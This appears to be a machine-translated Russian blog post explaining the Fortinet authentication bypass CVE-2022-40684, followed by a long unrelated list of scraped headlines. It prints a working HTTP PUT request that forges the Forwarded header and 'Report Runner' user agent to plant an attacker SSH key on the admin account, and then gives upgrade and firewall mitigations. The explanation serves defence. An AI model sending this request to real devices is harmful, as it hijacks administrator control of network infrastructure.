CVE-2022-40684

Dec 02 2022
Об уязвимости CVE-2022-40684 — это уязвимость обхода аутентификации в некоторых продуктах Fortinet, таких как FortiOS, Fortiproxy и FortiSwitchManager. Это означает, что, используя эту уязвимость, злоумышленник может обойти аутентификацию и войти в систему как администратор.

Об уязвимости

CVE-2022-40684 — это уязвимость обхода аутентификации в некоторых продуктах Fortinet, таких как FortiOS, Fortiproxy и FortiSwitchManager. Это означает, что, используя эту уязвимость, злоумышленник может обойти аутентификацию и войти в систему как администратор. Базовая оценка этой уязвимости составляет 9,8, что делает ее очень критической. Прежде чем двигаться дальше, давайте разберемся, что это за продукты:

  1. FortiOS: как следует из названия, FortiOS, сетевая операционная система Fortinet , является сердцем Fortinet Security. Эта операционная система является ядром Security Fabric и связывает все компоненты вместе, чтобы обеспечить тесную интеграцию во всем развертывании организации.
  2. FortiProxy: это безопасный веб-прокси, который защищает сотрудников от интернет-атак, используя несколько методов обнаружения, таких как веб-фильтрация.
  3. FortiSwitchManager (FSWM) — это локальная платформа управления продуктом FortiSwitch . Устройства FortiSwitch подключаются к FortiSwitch Manager по сети уровня 3. Вы можете настроить большое количество устройств FortiSwitch с помощью этой платформы, предназначенной только для управления FortiSwitch.

Влияние

Баг позволит неавторизованному пользователю выполнять операции прямо в панели администратора через некоторые HTTP/S-запросы (методы могут быть GET, POST, DELETE и т. д.). Наличие роли администратора может вызвать некоторые из следующих событий:

  1. Управление взять на себя все приложение
  2. Получение доступа к внутренней инфраструктуре
  3. Добавление или удаление пользователей
  4. Доступ к конфиденциальным данным
  5. Измените ключи SSH пользователей-администраторов, чтобы злоумышленник мог войти в скомпрометированную систему.
  6. Вмешательство в различные файлы конфигурации и т. д.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by= ”[127.0.0.1]:9000 ″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= [email protected] \”” }

  • Используя заголовок Fowarded, злоумышленник может установить для client_ip значение «127.0.0.1».
  • Проверка аутентификации «доверенного доступа» подтверждает, что client_ip — «127.0.0.1», а User-Agent — «Report Runner», оба из которых находятся под контролем злоумышленника.

«Найти средство защиты гораздо важнее, чем найти ошибку»

Ниже приведены некоторые исправления для защиты организации от CVE-2022–40684.

  1. Модернизация затронутых продуктов.
    Обновите версию FortiOS до ≥7.2.2 и ≥7.0.7
    Обновите версию FortiProxy до ≥7.2.1 и ≥ 7.0.7
    Обновите FortiSwitchManager версии ≥7.2.1 и ≥7.0.1
  2. Отключите административный интерфейс http/https в FortiOS, FortiProxy и FortiSwitchManager.
  3. Для FortiOS ограничьте IP-адреса, которые могут получить доступ к административному интерфейсу.

    4. config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
end


    config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end


    config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end


    config firewall service custom
edit GUI_HTTPS
set tcp-portrange <admin-sport>
next
edit GUI_HTTP
set tcp-portrange <admin-port>
end


config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
end

Структуры данных в JavaScript
Структуры данных в JavaScript
В любом случае, что такое связанный список? [Часть 1]
В любом случае, что такое связанный список? [Часть 1]
Итак, расскажите мне о связанных списках
Итак, расскажите мне о связанных списках
Когда все остальное терпит неудачу, проявите творческий подход
Когда все остальное терпит неудачу, проявите творческий подход
Мой звездолет на краю света
Мой звездолет на краю света
Лазанья из тыквы и капусты
Лазанья из тыквы и капусты
Не боясь неудач, Уокер Бюлер снова добивается успеха в игре 6 NLCS.
Не боясь неудач, Уокер Бюлер снова добивается успеха в игре 6 NLCS.
Хорошо с Келлом: Друг, очисти свой кишечник!
Хорошо с Келлом: Друг, очисти свой кишечник!
Мой сосед
Мой сосед
Блестящий
Блестящий
Творчество как компас
Творчество как компас
Влияние страха и горя на творчество
Влияние страха и горя на творчество
Влияние одиночества на творчество
Влияние одиночества на творчество
Но что, если мне некуда возвращаться?
Но что, если мне некуда возвращаться?
Невидимое горе
Невидимое горе
Я наконец бросил курить
Я наконец бросил курить
Я больше не чувствую себя виноватым из-за того, что не работаю в условиях изоляции
Я больше не чувствую себя виноватым из-за того, что не работаю в условиях изоляции
Америка всегда была жестокой и одинокой пустыней
Америка всегда была жестокой и одинокой пустыней
Краткий обзор двух сцен из "Бората 2"
Краткий обзор двух сцен из "Бората 2"
Вашему трансгендерному ребенку нужен терапевт - и вам тоже
Вашему трансгендерному ребенку нужен терапевт - и вам тоже
Уроки жизни любезно предоставлены моим трансгендерным сыном
Уроки жизни любезно предоставлены моим трансгендерным сыном
Я не хочу позволять беспокойству иметь всю силу
Я не хочу позволять беспокойству иметь всю силу
Раздражающие маски для лица, мода и опасения по поводу COVID-19
Раздражающие маски для лица, мода и опасения по поводу COVID-19
Samsung Galaxy Note 20 Ultra: правильный телефон, неправильное время
Samsung Galaxy Note 20 Ultra: правильный телефон, неправильное время
Как Мелисса Гилберт спасла птицу, поймав ее под ночную рубашку
Николь Кидман понравилась эта привлекательная черта, которую Майкл Китон и Вэл Килмер поделили в роли Бэтмена
Джон Леннон сказал 1 строчку в песне The Beatles «Revolution» прокомментировал полицию
Долли Партон нашла Бога в заброшенной церкви Местных подростков использовали для секса
«Мой путь» Фрэнка Синатры не был таким большим, как его «Старый Макдональд»
Актерская карьера Брэдли Купера была под угрозой, когда он работал с Джулией Робертс в этом проекте
«Не спите в метро» озадачила Петулу Кларк
Песня The Rolling Stones «Sympathy for the Devil» изначально звучала как бразильская музыка
Петула Кларк сказала, что «Downtown» показал отчаянную песню
Совет Джимми Пейджа для молодых музыкантов прямо из справочника мотивационных ораторов
Мик Джаггер сказал, что песня The Rolling Stones «Their Satanic Majesties Request» была вдохновлена ​​Acid, а не Beatles
Пол Маккартни сказал, что ему повезло, что он никогда не употреблял героин 
Джин Симмонс говорит, что комиксы KISS потенциально могут «воссоздать человечество».
«Мальчик познает мир»: почему мистер Тернер исчез из сериала?
Ринго Старр отказывается играть с клик-треком, и это делает его лучшим барабанщиком
Взгляд назад на роль Бадди Эбсена в «Шоу Энди Гриффита»
Пол Маккартни сказал, что сержант. Песня Пеппер не о героине
Пол Маккартни: Suffering сделал 1 песню из «Белого альбома» The Beatles хорошей
Джон Леннон поделился, почему «Вечернее шоу» было «самым неловким» шоу, в котором он когда-либо участвовал
Сэм Хьюэн точно знает, что он возьмет из съемочной площадки «Чужестранки»: «Я чувствую себя Джейми, когда надеваю их»
Песню The Beatles Питер Эшер назвал «величайшей песней, которую я когда-либо слышал»
Квентин Тарантино однажды поделился самым интересным персонажем, которого он когда-либо писал, был в «Криминальном чтиве»
Ранняя песня Beatles, которая вошла в число «самых захватывающих выступлений» группы, по мнению инсайдера Fab Four
Пол Маккартни был так расстроен из-за единственного отмененного концерта The Beatles, что его вырвало
Дэвид Боуи чуть не написал мюзикл из поддельных песен Боба Дилана
Как Пол Маккартни отреагировал на название «Битлз» «Люси в небе с бриллиантами»
Джордж Харрисон расстроился, что его слова для «Hurdy Gurdy Man» Донована не были использованы
«Загадочная история Натальи Грейс»: где сегодня Натайла, Кристин и Майкл Барнетт?
Джон Леннон сказал, что песня B-52 звучала «прямо как музыка Йоко»
МВД однажды напало на песню Джона Леннона «Дайте миру шанс»
Как умер Джон Риттер: оглядываясь назад на смерть актера «Компании троих»
Вайнона Райдер однажды поделилась, что все ее персонажи были написаны как «уродливая девушка» в начале ее карьеры
Принц работал над песней Стиви Никс в течение часа и заработал половину гонорара 
Долли Партон помогла своей «инвалидной» бабушке, когда ни один из других внуков не стал бы — она тоже разыгрывала ее
Пол Маккартни назвал песню The Beatles «Когда мне будет шестьдесят четыре» шуткой
Пол Маккартни представил, как его мама отреагировала бы на его успех
Билли Кристал и Робин Уильямс импровизировали все камео «Друзей»
Лучшее время для посещения места съемок «Маленького домика в прерии»
Кристофер Нолан однажды пожалел, что прочитал «Криминальное чтиво» Квентина Тарантино.
Яна Дуггар: все, что она говорила о любви и ее 5-летнем окне, чтобы найти «того самого»
Донован сравнил одну из своих песен с песней The Beatles «Lucy in the Sky with Diamonds».
Почему Пола Маккартни «заботились» о том, чтобы он не говорил правду о «Битлз»
Стиви Никс «прицепилась» к одной песне Джони Митчелл, когда почувствовала, что ее музыкальная карьера терпит неудачу
Джуди Нортон из «Уолтонов» поняла, что иногда она была «девчонкой», когда снимала шоу
Пол Маккартни рассказал, что больше всего впечатлило его в Джоне Ленноне, когда они впервые встретились
Менеджер Led Zeppelin Питер Грант увидел, что фейковая группа выиграла Грэмми раньше, чем Зеп
Брэду Питту и Харрисону Форду пришлось придумывать «Собственность дьявола» на лету, когда «сценарий был выброшен»
Тейлор Шеридан только что добавил одну из своих любимых звезд «Йеллоустоуна» в актерский состав «Законники: Басс Ривз»
Засуха и изменение климата угрожают будущему гидроэнергетики США
Следует ли использовать Facebook или Google для входа на другие сайты?
В чем разница между быстрорастворимыми и активными сухими дрожжами?
В чем разница между демократией и республикой?
Where in the World Are You? Take our GeoGuesser Quiz
Взгляд на самые запоминающиеся свадьбы Белого дома
Пожертвуйте свои волосы, чтобы помочь сохранить нашу воду чистой
Может быть, вы можете быть слишком худым? Познакомьтесь с самым тонким небоскребом в мире
5 красноречивых и запоминающихся цитат Майи Энджелоу
Сколько вам должно быть лет, чтобы арендовать автомобиль в США?
Волнистые попугайчики очень общительны и становятся отличными домашними животными
Почему Шрирача — любимый всеми острый соус
Объективное и субъективное мышление и его применение
Мотылек Атлас — бегемот, плюс еще 5 фактов
Время может не существовать, говорят некоторые физики и философы
Как восстановить заводские настройки вашего iPhone
Самая высокая гора Солнечной системы намного выше Эвереста
Что такое геноцид и совершает ли его Россия в Украине?
Кем был Понтий Пилат до и после распятия Иисуса?
Глицинат магния против витаминных добавок с цитратом
Какой грейпфрут самый сладкий — белый, красный или розовый?
Индукционная плита лучше, чем газовая или электрическая?
Припять: украинский город-призрак в тени Чернобыля
The Secrets of Airline Travel Quiz
Как Водолей и Телец справляются с любовью и трудностями вместе
Какой самый сильный укус животного в мире?
Крошечная группа самаритян до сих пор исповедует свою древнюю религию
Венецианская биеннале — «Олимпиада искусств»
5 причин, почему «следовать своей страсти» может быть проблематично
Вы бы съели Casu Marzu, незаконный сыр с личинками?
Орхидейный богомол выглядит как цветок, а жалит как пчела
Отличные побеги! 5 диких животных, которые сбежали
Миксина: эта машина, похожая на угря, — кошмар хищника
Как избавиться от сливных мух
Насколько глубок океан?
Chief Plenty Coups: дальновидный лидер и защитник нации воронов
Может ли недавно измеренный W-бозон разрушить Стандартную модель?
Кетанджи Браун Джексон утвержден в качестве судьи Верховного суда
1500 долларов сегодня можно купить проездной на Йеллоустоун на 2172 год.
Почему в США нет «безвозвратной» налоговой системы?
Отели с насекомыми выкатывают приветственный коврик для жуков всех видов
Могут ли виртуальные электростанции помочь стабилизировать энергосистему США?
Откуда взялась фраза «В бегах»?
Нужно ли иметь позитивный настрой, чтобы победить рак?
Марта Митчелл: женщина, которая слишком много знала об Уотергейт
Что такое ядовитая таблетка и сможет ли Твиттер держать Илона Маска в страхе?
Вдохновляющая и трагическая история Софи Шолль, студентки, бросившей вызов Гитлеру
Что такое влажность и как влажность влияет на температуру?
Мое Elden Ring: Призыв игрока Shadow Of The Erdtree, рейтинг
Популярный YouTube-рэпер и известный мастер TikTok устроили вирусный лай-матч
Теперь вы можете стать обладателем самого культового бикини в научной фантастике
Не позволяйте кошке царапать мебель с помощью этих научно обоснованных стратегий
Судьба молодого бандита The Wild Reason в суде над YSL Rico займет больше времени, чем ожидалось
Посмотрите, как Motorweek тестирует Sterling, забытый британский взгляд на легенду Acura
Я умоляю игроков Final Fantasy 14 просто прочитать диалоги в Dawntrail
Некоторые фанаты Mortal Kombat обеспокоены тем, что последняя игра уже мертва, но она может быть более сложной
Lionsgate дает себе один год, чтобы изменить название Now You See Me 3 на Now You Three Me
ИИ будет эксгумировать голоса мертвых знаменитостей, чтобы читать вам PDF-файлы или что-то еще
Покойся с миром, Роберт Таун, оскароносный сценарист «Китайского квартала»
Xbox пережил серьезный сбой [обновление: он снова работает]
Приключение Тианы в Байю ломает 87-летний канон странного канона принцесс Диснея
Байден аплодирует постановлению Верховного суда об иммунитете Трампа и указывает на опасность бесконтрольной власти
Эдди Мерфи рассказывает обо всем в своем пресс-туре «Полицейский из Беверли-Хиллз: Аксель Ф.»
Папа Франциск утвердил первого тысячелетнего святого
Кейт Бланшетт объясняет, почему она в фильме «Пограничье»
Плохие новости для Фани Уиллис и ее дела о вмешательстве в выборы Трампа
Мужчина из Луизианы разослал пугающее предупреждение перед всплеском преступности
MaXXXine — это сочная голливудская сказка, которая кажется слишком скучной
Племянница Лютера Вандросса рассказала о его душераздирающем интервью с Опрой Уинфри после инсульта
Водителю удалось перевернуть Tesla Cybertruck, беспилотное вождение не требуется
Опрос: демократы следят за Трампом, заменят ли они Байдена на Байдена, Байдена или Байдена
McLaren просто не может перестать увольнять пилотов IndyCar, ей это на самом деле нравится
«Шоу Черной Пантеры» от Marvel станет самым важным анимационным шоу за всю историю
Дэдпул и Росомаха наконец-то разблокируют фильмы Marvel о Людях Икс
Верховный суд выслушает аргументы о том, может ли закон Техаса определять ваши пристрастия к порнографии
Ридли Скотт «не был счастлив», когда были розданы сиквелы «Чужого» и «Бегущего по лезвию»
Нехорошо: ураган Берилл — самый ранний шторм 5-й категории в истории человечества
Полицейский из Беверли-Хиллз: обзор Акселя Ф: Эдди Мерфи расслабляется в несложном возврате Netflix
Одной из многих отвергнутых Райаном Рейнольдсом идей «Дэдпула 3» было инди-путешествие
Страшная турбулентность отправила человека в мусорный бак в вирусном видео
Верховный суд постановил, что Трамп обладает иммунитетом за любое преступление, совершенное между 9 и 5 часами
Двое палестинских детей «травмированы» после того, как женщина якобы попыталась их утопить
Режиссер «Твистера» не получил предупреждения «Торнадо» о «Твистерах»
Новые ошибки с открытым исходным кодом делают тысячи приложений iOS уязвимыми для взлома
За 9800 долларов вы бы упаковали их в эту семиместную Toyota RAV4 2008 года выпуска?
Сможет ли Симона Байлз подготовить SZA к Олимпийским играм?
Вот почему Эдди Мерфи был «вынужден» изменить свой знаменитый смех
Вы хотите корвет, но хотите, чтобы он выглядел ужасно? Мальчик, у нас есть для тебя машина?
Истерия Кейт Бланшетт, вызванная бензопилой, привела ее в Пограничье
Помните, как голландская авиакомпания поместила 440 белок в гигантский измельчитель?
Сделайте себе одолжение и посмотрите лучшее соревнование года по скоростному бегу
Land Rover Defender Octa — зверь мощностью 626 л.с., выступающий за хищников мира
Boeing просит всех перестать говорить, что испытание Starliner на МКС провалилось
Я провел выходные с удаленной игрой и облачными играми, и это было круто
Резюме «Медведя»: Маркус — самый добрый, мягкий и искренний человек в Чикаго?
BMW не хочет, чтобы автомобили, сгоревшие в автовозе, выставлялись на продажу
Кто жена Джона Клиза? Все о Дженнифер Уэйд
Мэтью МакКонахи рассказал, как гадалка посоветовала ему сняться в фильме «Как отделаться от парня за 10 дней».
Все об отношениях Зои Кравиц с родителями Ленни Кравиц и Лизой Боне
Дуэйн Джонсон говорит, что его мама «в порядке» после ночной автомобильной аварии, и «продолжит проходить обследование»
Найдены тела рэперов, пропавших без вести после отмены концерта: «Они этого не заслужили»
Американское фигурное катание «разочаровано» отсутствием окончательного решения в командном зачете и призывает к справедливому решению
Профессор Университета Пердью арестован за торговлю метамфетамином и предложение женщинам сексуальных услуг
Дочь Кевина Джонаса Алена выглядит взрослой на фото в день рождения: «9 лет не кажутся реальными»
Bengals Running Back Джо Миксон разыскивается по ордеру на арест, выданному за якобы направленное огнестрельное оружие на женщину
Маргарет Джозефс защищает «разрушительный» выбор Мелиссы и Джо Горги пропустить свадьбу Терезы Джудиче
Том Джирарди присутствует на слушаниях, чтобы определить его способность предстать перед судом по обвинению в мошенничестве
В этом секретном разделе распродажи на Nordstrom Rack спрятано более 2500 стилей для холодной погоды — от 6 долларов.
Боб Баркер, давний ведущий программы The Price Is Right, умер в возрасте 99 лет: «Величайший MC в мире»
Кто муж Мены Сувари? Все о Майкле Хоупе
Ясмин Воссоугян из MSNBC говорит, что доктор отклонил ее боли в груди как рефлюкс, а затем начался ее «кошмар»
Marvel на самом деле публикует вымышленные мемуары Скотта Лэнга из «Человека-муравья и Осы: Квантумания»
Пол Маккартни о «романтике» с женой Нэнси Шевелл: «Я полностью переусердствовал с Днем святого Валентина»
Певица Flashdance Айрин Кара умерла от гипертонии и высокого уровня холестерина: отчет
Олимпийская чемпионка Жасмин Камачо-Куинн празднует победу своего брата Роберта Куинна в Суперкубке
Чарли Рейнольдс рассказывает о недавней операции на голосовых связках: «У меня были проблемы с пением»
Женщина, которая умерла 37 лет назад после того, как ее нашли без сознания на шоссе Джорджии, идентифицирована как пропавшая мать 4 детей
Служба спасения животных предупреждает: «Никогда не красьте птицу» после того, как «борющийся» розовый голубь был найден блуждающим по Нью-Йорку
Эрик и Джесси Джеймс Декер всегда «целуются друг с другом» — и детям это не нравится
Пропавшая 17-летняя девочка, вероятно, замерзла после того, как въехала в канаву в сельской местности Висконсина: официальные лица
Кто муж Лизы Вандерпамп? Все о Кене Тодде
Ти Джей Уотт хочет, чтобы Том Брэди и его брат Джей Джей вместе были введены в Зал славы НФЛ
Lizzo предоставила товарный знак «100% THAT Bitch» после того, как заявка была отклонена
Хронология отношений Сюзанны Сомерс и Алана Хэмела
Гвинет Пэлтроу рассказала о платье для свиданий, которое она хранила от отношений с Брэдом Питтом 
Женщина найдена живой и «задыхающейся» в мешке для трупов в похоронном бюро Айовы
Джимми Баффет, певец «Маргаритавиля», умер в 76 лет
Поместье Кирсти Элли перечисляет дом покойной звезды во Флориде за 6 миллионов долларов, который она купила у Лизы Марии Пресли.
Кто муж Эллисон Феликс? Все о Кеннете Фергюсоне
Покупатели Amazon говорят, что они спят «как избалованные младенцы» благодаря этим шелковым наволочкам, которые стоят всего 10 долларов
Даниэль Моне Труитт из «Закона и порядка» считает, что фанатов «обманули; Стейблер и Бенсон Kiss Tease
Кто жена Винса Вона? Все о Кайле Вебер
Кто жена Джея Шетти? Все о Радхи Девлукиа-Шетти
История знакомств Авы Гарднер: взгляд назад на браки и романы голливудской иконы
Ланиша Коул празднует свой первый День матери: «Я невероятно благодарна»
Сьюзан Луччи со слезами на глазах вспоминает покойного мужа и признается, что «еще не готова» начать встречаться
Вупи Голдберг показывает Киту Харингтону свой туалет в стиле «Игры престолов»: «Настоящий железный трон»
Хизер Рэй и Тарек Эль Мусса приветствуют своего мальчика: «Наши сердца так счастливы»
Покупатели согласны с тем, что эта подметальная машина Black + Decker «намного быстрее», чем традиционная метла, и она продается со скидкой
Челси Хоуска из «Мамы-подростка» со слезами на глазах отреагировала на продление второго сезона шоу HGTV: «Это так много значит»
Хлое Черри из Euphoria грозит обвинение в краже блузки за 28 долларов
Кто жена Джона Оливера? Все о Кейт Норли
Молли Рингуолд празднует 22-летие с мужем Панио Джанопулосом: «Лучшее решение, которое я когда-либо принимала»
Медсестра Люси Летби признана виновной в убийстве семи младенцев в британской больнице
Я 21-летний студент колледжа. Что я могу сделать сейчас, что навсегда изменит мою жизнь?
Мне 17, и я планирую пойти в HRT, когда я выпущусь в этом году, когда мне будет 18 лет. А до тех пор, что я мог сделать, чтобы почувствовать себя более женственной?
Мне 13 лет, я трансгендер (ftm), и уже несколько месяцев наблюдаюсь у психотерапевта. Как я могу сказать ей, что я трансгендер, и попросить ее дать совет, чтобы открыться?
Если я хочу узнать, чтобы начать лечение по изменению пола, к какому врачу мне следует обратиться?
Что самое полезное я могу сделать в 14 лет?
Мне 23 года. Что я могу сделать сейчас, что навсегда изменит мою жизнь?
Какие изменения произойдут, если вы перейдете на ЗГТ в 13 лет?
Стоит ли делать операцию на дне при переходе от мужчины к женщине?
Почему я никогда не видел трансгендера из женщины в мужчину?
Спиронолактон вреден для ЗГТ?
Мне 14 лет, и мне быстро надоедают ее увлечения. Как найти свою страсть и талант?
Через месяц мне исполнится 17, и я подумал, что на самом деле не чувствую себя таким уж отличным от 11, это нормально? Действительно ли я изменюсь, когда стану старше?
Я все еще трансгендер (FTM), если у меня появились признаки только тогда, когда я достиг половой зрелости?
Мне 14 лет, какой совет вы хотели бы мне дать, который будет полезен на всю оставшуюся жизнь?
Это нормально, что мне 13 лет, но я все еще ребенок в душе?
Рекомендуется ли ЗГТ трансгендерным подросткам?
Как мне получить ЗГТ, не говоря, что я хочу ЗГТ?
Половое созревание происходит поэтапно? Может ли он остановиться, а затем снова начаться?
Каков наилучший способ естественного перехода от мужчины к женщине?
Можно ли начинать прием гормонов MTF HRT в 13 лет?
Мне 16, в следующем месяце исполнится 17. Как мне обратиться к терапевту, если моя мама считает, что он мне не нужен?
Является ли 18 подходящим возрастом для начала перехода в MTF?
Как изменить свою жизнь в 17 лет?
Я перехожу от женщины к мужчине. Каким должно быть мое новое имя?
Что может сделать 14-летний ребенок, чтобы сделать свою жизнь лучше/легче?
У меня депрессия, 13 лет, и я хочу обратиться к врачу по этому поводу, но я боюсь этого и того, что мои родители отмахнутся от этого, как от моих гормонов и тому подобного. Что я должен делать?
Какие необходимые жизненные навыки я могу освоить за эти 3 месяца лета? Мне 17 лет.
Трансгендер: Что было самым сложным в вашем переходе от мужчины к женщине?
Мне только что исполнилось 17, что мне теперь делать, чтобы гарантировать себе лучшую жизнь?
Мне 19 и я единственный ребенок. Я впадаю в депрессию и беспокоюсь о том, что что-то случится с моими родителями, потому что они — все, что у меня есть. У меня нет друзей, и я не смог их завести из-за пандемии. Я боюсь одиночества, что я могу сделать, чтобы помочь себе?
В каком возрасте лучше начинать переход от женщины к мужчине?
Что самое важное должен помнить 14-летний подросток?
Как остановить половое созревание без блокаторов полового созревания?
Во время смены пола с мужского на женский, каково это, когда растет грудь?
На ваш взгляд, переход от женского пола к мужскому (FtM) или от мужского к женскому (MtF) сложнее?
Что должно произойти, если вы никогда не достигнете половой зрелости?
Как начать переход от мужчины к женщине? Я всегда была девушкой внутри. Что мне нужно сделать?
Каковы негативные последствия прохождения периода полового созревания (психическое здоровье и т. д.)?
Как мне жить полной жизнью в 19 лет?
Мне 19 сегодня. Что самое важное, чему я должен научиться?
Мне 17 лет, что мне делать, чтобы получить больше знаний?
Мне 19. Я все еще в процессе полового созревания?
Как мне записаться на прием к врачу, чтобы мои родители и они не знали, зачем я иду? Мне 15.
Как мне, 13-летнему, копить и хранить деньги без ведома родителей?
Стоит ли начинать ЗГТ в 18 лет (трансгендер)?
Мне 30 лет. Что я могу сделать сейчас, что навсегда изменит мою жизнь?
Все ли проходят период полового созревания?
Каковы плюсы и минусы полового созревания?
Должен ли я открывать исходный код своего приложения, если я использую немодифицированные данные API, лицензированные по CC-BY-SA 4.0
Почему маринованные фрукты и овощи не входили в (европейский) рацион в эпоху парусного спорта?
Раздвижная головоломка 3 x 2
Как правильно закрыть сокет C # в .NET Core 3.1?
Включите альфа-тест для нового редактора стеков
Относительно кандидата наук, отказавшегося от студента из-за проблем со здоровьем
У Луны есть такая скорость, чтобы не упасть на Землю и не улететь в космос. Каковы шансы?
Что такое бомбы Эллермана и как их идентифицировать?
Если маринование разрушает витамин С, насколько квашеная капуста богата витамином С?
Есть ли двойная форсированная матовая позиция?
Эффект Вильсона: насколько «глубоки» солнечные пятна?
Как вывести список моих заданий k8s с помощью сложного LabelSelector по отдельности?
прокси nginx для Tomcat с SSL
Как следить за ограничением скорости на дорогах в средневековье? [дубликат]
« $\Sigma_1^1$-Пеано арифметика »- это точно $\mathbb{N}$?
Удалить внутреннюю границу в type = color
Первоначальная группа лидеров Моисея Исход 18:21
Как снять кольца Сатурна?
Kubernetes - можно ли объединить Pod.yaml и Service.yaml в одном файле yaml (но без развертывания)
Можно ли охарактеризовать максимальные антицепи в терминах дистрибутивных решеток?
MOC: вопрос об использовании товарного знака LEGO
«Сорок дней и сорок ночей»
История моды на оборотней, часть 1: 2000-е
Каковы самые большие препятствия для внедрения RL в производство?
Regex_search c ++
«Они не несут вины и не умирают»
Самый чистый способ использовать BeginTransaction с помощью try catch
Сгруппировать список по элементам вложенного списка [дубликат]
Как получить конкретный текст, принадлежащий классу div
Как узнать, есть ли в массиве 2 или более одинаковых элемента? [дубликат]
Принцип отражения против вселенных
Можем ли мы производить электричество из марсианских песчаных бурь? Если да, то можно ли его использовать для питания колоний?
Как прикрепить кристаллы к шаманской палочке без клея?
Может ли Верховный суд объявить импичмент неконституционным? [дубликат]
Joomla Выбор из БД И / ИЛИ группировки
Насколько большим должен быть QR-код на моей крыше, чтобы спутник мог его сканировать при допустимом сегодня разрешении?
Можно ли использовать дерево Штерна-Броко для лучшей сходимости $2^m/3^n$?
Почему самолеты не летят по направлению к траектории захода на посадку раньше?
Обидно ли убивать моего веселого персонажа в конце моей книги?
Спросите [префикс] [инфиксный] [суффикс] разрешение. Что [целое]?
Какое правило вести войну в городах?
Использование необычного еврейского слова для «сияния» в Исходе
java: получить количество всех отдельных ключей и значений в Map <String, Set <String>> [дубликат]
Какая матрица логарифма производного оператора ( $\ln D$)? Какую роль играет этот оператор в различных математических областях?
Докажите, что последовательность $\{a_n\}_n$ определяется $a_1=-\frac14$ а также $-a_{n+1}=\frac{a_na_{n+1}+4}4$ сходится и найти свой предел.
Более подробное описание инцидента с безопасностью в мае 2019 года: отзывы о публикации в блоге
winforms C # .NET - Как повысить производительность моего кода при использовании циклов (for, foreach и т. д.) [закрыто]
Получение значения href поля Link элемента Link в scriban [дубликат]
5 техник творческого письма, которые приводят к созданию интересных статей
5 техник творческого письма, которые приводят к созданию интересных статей
Чат-бот для Asset Control
Чат-бот для Asset Control
Тишина
Тишина
Доверять своему первому инстинкту в отношениях жизненно важно
Доверять своему первому инстинкту в отношениях жизненно важно
Что мы строим в 2020 году
Что мы строим в 2020 году
Более конкретное подавление ошибок потока
Более конкретное подавление ошибок потока
Лучшие языки программирования для инженеров ИИ в 2020 году
Лучшие языки программирования для инженеров ИИ в 2020 году
Причины выбрать PyTorch для глубокого обучения
Причины выбрать PyTorch для глубокого обучения
Саманта Лазар
Саманта Лазар
Водоворот года
Водоворот года
Приглашение
Приглашение
Два репозитория Python для визуализации текста
Два репозитория Python для визуализации текста
Максимальное использование: UX-дизайн гибридных приложений
Максимальное использование: UX-дизайн гибридных приложений
Уведомления и сигналы тревоги во Flutter
Уведомления и сигналы тревоги во Flutter
6 вещей, которые я узнал от Брендона Берчарда
6 вещей, которые я узнал от Брендона Берчарда
У высокопродуктивных людей есть ритуальный распорядок дня
У высокопродуктивных людей есть ритуальный распорядок дня
Сделайте то, что для вас наиболее важно к полудню
Сделайте то, что для вас наиболее важно к полудню
Почему не стоит принимать вещи лично
Почему не стоит принимать вещи лично
5 вещей, которые объединяют высоких достижений
5 вещей, которые объединяют высоких достижений
Хэллоуин на спектруме
Хэллоуин на спектруме
Я взрослый аутист и ненавижу Хэллоуин
Я взрослый аутист и ненавижу Хэллоуин
Я никогда не думал, что буду кивать в знак одобрения порядочности Джорджа Буша
Я никогда не думал, что буду кивать в знак одобрения порядочности Джорджа Буша
Появление децентрализованных финансов
Появление децентрализованных финансов
Визуализация взрывного роста DeFi в 2020 году
Визуализация взрывного роста DeFi в 2020 году
ja/shares
es/shares
de/shares
fr/shares
th/shares
pt/shares
ru/shares
vi/shares
it/shares
ko/shares
tr/shares
id/shares
pl/shares
hi/shares
japost
espost
depost
frpost
thpost
ptpost
rupost
vipost
itpost
kopost
trpost
idpost
plpost
hipost

© Copyright 2021 - 2025 | All Rights Reserved